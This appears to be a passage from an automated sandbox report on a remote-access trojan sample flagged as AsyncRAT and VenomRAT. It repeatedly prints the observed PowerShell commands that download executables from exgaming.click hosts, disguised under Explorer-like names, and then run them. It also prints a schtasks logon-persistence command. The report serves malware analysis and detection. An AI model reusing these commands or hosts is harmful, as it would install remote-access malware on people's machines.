                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: sspicli.dll
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: uxtheme.dll
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: rasapi32.dll
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: rasman.dll
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: rtutils.dll
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: mswsock.dll
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: winhttp.dll
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ondemandconnroutehelper.dll
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: iphlpapi.dll
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: dhcpcsvc6.dll
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: dhcpcsvc.dll
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: dnsapi.dll
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: winnsi.dll
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: rasadhlp.dll
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: atl.dll
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: mscoree.dll
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: kernel.appcore.dll
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: version.dll
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: vcruntime140_clr0400.dll
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ucrtbase_clr0400.dll
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptsp.dll
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: rsaenh.dll
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptbase.dll
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: windows.storage.dll
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wldp.dll
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: msasn1.dll
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: amsi.dll
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: userenv.dll
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: profapi.dll
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: msisip.dll
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wshext.dll
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: appxsip.dll
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: opcservices.dll
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: gpapi.dll
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: secur32.dll
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: sspicli.dll
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: uxtheme.dll
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: propsys.dll
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: apphelp.dll
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: dlnashext.dll
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wpdshext.dll
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: atl.dll
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: mscoree.dll
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: kernel.appcore.dll
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: version.dll
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: vcruntime140_clr0400.dll
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ucrtbase_clr0400.dll
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ucrtbase_clr0400.dll
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptsp.dll
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: rsaenh.dll
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptbase.dll
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: windows.storage.dll
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wldp.dll
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: msasn1.dll
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: amsi.dll
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: userenv.dll
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: profapi.dll
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: gpapi.dll
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: msisip.dll
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wshext.dll
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: appxsip.dll
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: opcservices.dll
                            Source: C:\Users\user\Desktop\ZzOTKK2V8l.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{5E5F29CE-E0A8-49D3-AF32-7A7BDC173478}\InProcServer32Jump to behavior
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorrc.dllJump to behavior
                            Source: ZzOTKK2V8l.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR
                            Source: ZzOTKK2V8l.exeStatic PE information: DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE

                            Data Obfuscation

                            barindex
                            .NET source code contains potential unpacker
                            Source: ZzOTKK2V8l.exe, ClientSocket.cs.Net Code: Invoke System.AppDomain.Load(byte[])
                            Source: AntiMalware.exe.0.dr, ClientSocket.cs.Net Code: Invoke System.AppDomain.Load(byte[])
                            Suspicious powershell command line found
                            Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell (New-Object System.Net.WebClient).DownloadFile('http://xcu.exgaming.click', 'C:\Users\user\AppData\Local\Temp\\ExpIorer.exe')
                            Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell (New-Object System.Net.WebClient).DownloadFile('http://xcu5.exgaming.click', 'C:\Users\user\AppData\Local\Temp\\ExplIorer.exe')
                            Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell Start-Process -FilePath 'C:\Users\user\AppData\Local\Temp\\ExpIorer.exe'
                            Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell Start-Process -FilePath 'C:\Users\user\AppData\Local\Temp\\ExplIorer.exe'
                            Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell (New-Object System.Net.WebClient).DownloadFile('http://xcu.exgaming.click', 'C:\Users\user\AppData\Local\Temp\\ExpIorer.exe')
                            Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell (New-Object System.Net.WebClient).DownloadFile('http://xcu.exgaming.click', 'C:\Users\user\AppData\Local\Temp\\ExpIorer.exe')
                            Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell (New-Object System.Net.WebClient).DownloadFile('http://xcu5.exgaming.click', 'C:\Users\user\AppData\Local\Temp\\ExplIorer.exe')
                            Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell Start-Process -FilePath 'C:\Users\user\AppData\Local\Temp\\ExpIorer.exe'
                            Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell Start-Process -FilePath 'C:\Users\user\AppData\Local\Temp\\ExplIorer.exe'
                            Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell (New-Object System.Net.WebClient).DownloadFile('http://xcu5.exgaming.click', 'C:\Users\user\AppData\Local\Temp\\ExplIorer.exe')
                            Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell Start-Process -FilePath 'C:\Users\user\AppData\Local\Temp\\ExpIorer.exe'
                            Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell Start-Process -FilePath 'C:\Users\user\AppData\Local\Temp\\ExplIorer.exe'
                            Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell (New-Object System.Net.WebClient).DownloadFile('http://xcu.exgaming.click', 'C:\Users\user\AppData\Local\Temp\\ExpIorer.exe') Jump to behavior
                            Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell (New-Object System.Net.WebClient).DownloadFile('http://xcu5.exgaming.click', 'C:\Users\user\AppData\Local\Temp\\ExplIorer.exe') Jump to behavior
                            Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell Start-Process -FilePath 'C:\Users\user\AppData\Local\Temp\\ExpIorer.exe'Jump to behavior
                            Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell Start-Process -FilePath 'C:\Users\user\AppData\Local\Temp\\ExplIorer.exe'Jump to behavior
                            Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell (New-Object System.Net.WebClient).DownloadFile('http://xcu.exgaming.click', 'C:\Users\user\AppData\Local\Temp\\ExpIorer.exe')
                            Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell (New-Object System.Net.WebClient).DownloadFile('http://xcu5.exgaming.click', 'C:\Users\user\AppData\Local\Temp\\ExplIorer.exe')
                            Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell Start-Process -FilePath 'C:\Users\user\AppData\Local\Temp\\ExpIorer.exe'
                            Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell Start-Process -FilePath 'C:\Users\user\AppData\Local\Temp\\ExplIorer.exe'
                            Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell (New-Object System.Net.WebClient).DownloadFile('http://xcu.exgaming.click', 'C:\Users\user\AppData\Local\Temp\\ExpIorer.exe')
                            Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell (New-Object System.Net.WebClient).DownloadFile('http://xcu5.exgaming.click', 'C:\Users\user\AppData\Local\Temp\\ExplIorer.exe')
                            Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell Start-Process -FilePath 'C:\Users\user\AppData\Local\Temp\\ExpIorer.exe'
                            Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell Start-Process -FilePath 'C:\Users\user\AppData\Local\Temp\\ExplIorer.exe'
                            Source: C:\Users\user\Desktop\ZzOTKK2V8l.exeCode function: 0_2_00007FF848F400BD pushad ; iretd 0_2_00007FF848F400C1
                            Source: C:\Users\user\AppData\Roaming\AntiMalware.exeCode function: 13_2_00007FF848F300BD pushad ; iretd 13_2_00007FF848F300C1
                            Source: C:\Users\user\AppData\Roaming\AntiMalware.exeCode function: 18_2_00007FF848F100BD pushad ; iretd 18_2_00007FF848F100C1

                            Persistence and Installation Behavior

                            barindex
                            Tries to download and execute files (via powershell)
                            Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell (New-Object System.Net.WebClient).DownloadFile('http://xcu.exgaming.click', 'C:\Users\user\AppData\Local\Temp\\ExpIorer.exe')
                            Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell (New-Object System.Net.WebClient).DownloadFile('http://xcu5.exgaming.click', 'C:\Users\user\AppData\Local\Temp\\ExplIorer.exe')
                            Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell (New-Object System.Net.WebClient).DownloadFile('http://xcu.exgaming.click', 'C:\Users\user\AppData\Local\Temp\\ExpIorer.exe')
                            Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell (New-Object System.Net.WebClient).DownloadFile('http://xcu.exgaming.click', 'C:\Users\user\AppData\Local\Temp\\ExpIorer.exe')
                            Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell (New-Object System.Net.WebClient).DownloadFile('http://xcu5.exgaming.click', 'C:\Users\user\AppData\Local\Temp\\ExplIorer.exe')
                            Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell (New-Object System.Net.WebClient).DownloadFile('http://xcu5.exgaming.click', 'C:\Users\user\AppData\Local\Temp\\ExplIorer.exe')
                            Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell (New-Object System.Net.WebClient).DownloadFile('http://xcu.exgaming.click', 'C:\Users\user\AppData\Local\Temp\\ExpIorer.exe') Jump to behavior
                            Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell (New-Object System.Net.WebClient).DownloadFile('http://xcu5.exgaming.click', 'C:\Users\user\AppData\Local\Temp\\ExplIorer.exe') Jump to behavior
                            Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell (New-Object System.Net.WebClient).DownloadFile('http://xcu.exgaming.click', 'C:\Users\user\AppData\Local\Temp\\ExpIorer.exe')
                            Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell (New-Object System.Net.WebClient).DownloadFile('http://xcu5.exgaming.click', 'C:\Users\user\AppData\Local\Temp\\ExplIorer.exe')
                            Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell (New-Object System.Net.WebClient).DownloadFile('http://xcu.exgaming.click', 'C:\Users\user\AppData\Local\Temp\\ExpIorer.exe')
                            Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell (New-Object System.Net.WebClient).DownloadFile('http://xcu5.exgaming.click', 'C:\Users\user\AppData\Local\Temp\\ExplIorer.exe')
                            Source: C:\Users\user\Desktop\ZzOTKK2V8l.exeFile created: C:\Users\user\AppData\Roaming\AntiMalware.exeJump to dropped file

                            Boot Survival

                            barindex
                            Yara detected AsyncRAT
                            Source: Yara matchFile source: ZzOTKK2V8l.exe, type: SAMPLE
                            Source: Yara matchFile source: 0.2.ZzOTKK2V8l.exe.36ea760.0.unpack, type: UNPACKEDPE
                            Source: Yara matchFile source: 0.0.ZzOTKK2V8l.exe.600000.0.unpack, type: UNPACKEDPE
                            Source: Yara matchFile source: 00000000.00000000.1973127111.0000000000602000.00000002.00000001.01000000.00000003.sdmp, type: MEMORY
                            Source: Yara matchFile source: C:\Users\user\AppData\Roaming\AntiMalware.exe, type: DROPPED
                            Yara detected VenomRAT
                            Source: Yara matchFile source: 0.2.ZzOTKK2V8l.exe.36ea760.0.raw.unpack, type: UNPACKEDPE
                            Source: Yara matchFile source: 00000000.00000002.2006799224.00000000036E6000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                            Source: Yara matchFile source: Process Memory Space: ZzOTKK2V8l.exe PID: 6368, type: MEMORYSTR
                            Uses schtasks.exe or at.exe to add and modify task schedules
                            Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\schtasks.exe schtasks /create /f /sc onlogon /rl highest /tn "AntiMalware" /tr '"C:\Users\user\AppData\Roaming\AntiMalware.exe"'
                            Source: C:\Users\user\AppData\Roaming\AntiMalware.exeRegistry key monitored for changes: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot
                            Source: C:\Users\user\Desktop\ZzOTKK2V8l.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Users\user\Desktop\ZzOTKK2V8l.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Users\user\Desktop\ZzOTKK2V8l.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Users\user\Desktop\ZzOTKK2V8l.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Users\user\Desktop\ZzOTKK2V8l.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Users\user\Desktop\ZzOTKK2V8l.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Users\user\Desktop\ZzOTKK2V8l.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Users\user\Desktop\ZzOTKK2V8l.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Users\user\Desktop\ZzOTKK2V8l.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Users\user\Desktop\ZzOTKK2V8l.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Users\user\Desktop\ZzOTKK2V8l.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Users\user\Desktop\ZzOTKK2V8l.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Users\user\Desktop\ZzOTKK2V8l.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Users\user\Desktop\ZzOTKK2V8l.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Users\user\Desktop\ZzOTKK2V8l.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Users\user\Desktop\ZzOTKK2V8l.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Users\user\Desktop\ZzOTKK2V8l.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Users\user\Desktop\ZzOTKK2V8l.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Users\user\Desktop\ZzOTKK2V8l.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Users\user\Desktop\ZzOTKK2V8l.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Users\user\Desktop\ZzOTKK2V8l.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Users\user\Desktop\ZzOTKK2V8l.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Users\user\Desktop\ZzOTKK2V8l.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Users\user\Desktop\ZzOTKK2V8l.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Users\user\Desktop\ZzOTKK2V8l.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Users\user\Desktop\ZzOTKK2V8l.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Users\user\Desktop\ZzOTKK2V8l.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Users\user\Desktop\ZzOTKK2V8l.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Users\user\Desktop\ZzOTKK2V8l.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Users\user\Desktop\ZzOTKK2V8l.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Users\user\Desktop\ZzOTKK2V8l.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Users\user\Desktop\ZzOTKK2V8l.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Users\user\Desktop\ZzOTKK2V8l.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Users\user\Desktop\ZzOTKK2V8l.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Users\user\Desktop\ZzOTKK2V8l.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Users\user\Desktop\ZzOTKK2V8l.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Users\user\Desktop\ZzOTKK2V8l.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Users\user\Desktop\ZzOTKK2V8l.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
